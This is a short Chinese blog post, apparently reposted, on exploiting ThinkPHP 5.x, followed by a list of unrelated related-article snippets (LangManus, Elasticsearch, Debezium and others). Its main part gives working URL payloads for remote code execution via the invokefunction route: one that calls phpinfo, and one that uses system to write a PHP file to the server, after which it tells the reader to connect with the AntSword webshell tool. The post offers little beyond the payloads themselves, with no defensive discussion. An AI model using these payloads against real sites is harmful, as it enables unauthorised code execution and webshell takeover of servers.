常见框架漏洞:Thinkphp(TP)篇

embedded/2025/3/29 14:04:02/

简介

ThinkPHP(简称 TP)是一款流行的 国产开源 PHP 框架,遵循 MVC(Model-View-Controller) 设计模式,以简洁、高效、灵活著称,广泛应用于国内中小型 Web 项目开发。

Thinkphp5x远程命令执行及getshell

原理

rce

过程

打开网站

tps://i-blog.csdnimg.cn/direct/955bfb8dfc634d4d879949111873c79a.png" width="1412" />

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

 

在后面拼接指令即可

tps://i-blog.csdnimg.cn/direct/0dd288e9591842bf9663dfcaad02b2db.png" width="2172" /> 

getshell

 

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php

 访问后使用蚁剑链接即可


http://www.ppmy.cn/embedded/176683.html

相关文章

本地部署 LangManus

本地部署 LangManus 0. 引言1. 部署 LangManus2. 部署 LangManus Web UI 0. 引言 LangManus 是一个社区驱动的 AI 自动化框架&#xff0c;它建立在开源社区的卓越工作基础之上。我们的目标是将语言模型与专业工具&#xff08;如网络搜索、爬虫和 Python 代码执行&#xff09;相…

【原创】通过S3接口将海量文件索引导入elasticsearch

在医院海量影像文件通过s3传到蓝光存储时&#xff0c;要找一个文件需要全部文件遍历一遍&#xff0c;效率非常非常低。 S3 是对象存储服务&#xff0c;本身不是专门为快速文件查找设计的&#xff0c;而 Elasticsearch 是搜索引擎&#xff0c;在查找特定文件或数据方面具有明显…

Python实现MySQL数据库对象的血缘分析

Python控制台的程序&#xff0c;实现遍历MySQL中所有的SQL对象&#xff08;表、视图、用户定义函数、存储过程和触发器等&#xff09;&#xff0c;并取得它们之间之前的依赖性关系&#xff0c;并列出三张表&#xff0c;第一张表的第一列是所有的SQL对象名称&#xff0c;第二列是…

Debezium介绍

1.什么是Debezium Debezium 是一个开源的分布式平台&#xff0c;用于捕获数据库的变更事件&#xff08;CDC&#xff0c;Change Data Capture&#xff09;。它能够实时捕获数据库中的行级更改&#xff0c;并将这些更改作为事件流发送到消息中间件&#xff08;如 Apache Kafka&a…

Categorical分布(分类分布):深度学习中的离散建模利器

Categorical分布&#xff1a;深度学习中的离散建模利器 引言 对于深度学习研究者来说&#xff0c;概率分布是模型设计和优化的基石。在许多生成模型中&#xff0c;如变分自编码器&#xff08;VAE&#xff09;及其变种VQ-VAE&#xff08;Vector Quantized Variational Autoenc…

linux下配置allure的环境变量使之变为可执行文件

https://allurereport.org/docs/install-for-linux/ 操作步骤 1. 检查并删除已存在的符号链接&#xff08;如果存在&#xff09; 首先&#xff0c;检查/usr/bin/allure是否已经存在&#xff1a; ls -l /usr/bin/allure如果输出显示/usr/bin/allure已经存在&#xff0c;说明…

防重复请求方法总结 wx.request-微信小程序

在微信小程序中&#xff0c;为了防止 wx.request 的重复请求&#xff0c;可以通过以下几种方式来实现&#xff1a; 1.使用 wx.showLoading 和 wx.hideLoading 在请求中&#xff0c;使用 wx.showLoading 显示加载动画&#xff0c;请求完成后使用 wx.hideLoading 隐藏加载动画。…

Java 大视界 -- 基于 Java 的大数据机器学习模型的多模态融合技术与应用(143)

&#x1f496;亲爱的朋友们&#xff0c;热烈欢迎来到 青云交的博客&#xff01;能与诸位在此相逢&#xff0c;我倍感荣幸。在这飞速更迭的时代&#xff0c;我们都渴望一方心灵净土&#xff0c;而 我的博客 正是这样温暖的所在。这里为你呈上趣味与实用兼具的知识&#xff0c;也…